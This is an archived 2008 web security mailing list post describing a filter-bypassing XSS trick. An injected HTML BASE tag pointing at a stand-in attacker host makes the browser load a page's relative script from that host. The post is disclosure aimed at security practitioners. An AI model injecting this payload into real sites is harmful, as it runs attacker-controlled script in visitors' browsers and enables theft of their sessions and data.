[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[WEB SECURITY] Nice little XSS trick
- From: Amit Klein <aksecurity@xxxxxxxxx>
- Subject: [WEB SECURITY] Nice little XSS trick
- Date: Tue, 15 Jul 2008 13:33:41 +0200
Hi list
Recently I've been thinking about bypassing anti-XSS filters, and a nice
little trick occurred to me, which I haven't seen anywhere (e.g. it's
not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
mention BASe, but not the trick I describe here). The idea is to use the
HTML BASE tag to force loading of JS code from the attacker's host.
Consider a page with XSS vulnerability such as:
<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>
Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
next thing you know, the browser (IE, at least) loads the JS from
http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
"explicit" JS code involved in the payload itself.
Note that according to the HTML standard, BASE should be placed in the
HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
This is indeed observed by FF 2, but not by IE (checked IE6).
Thanks,
-Amit
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
Search this site
|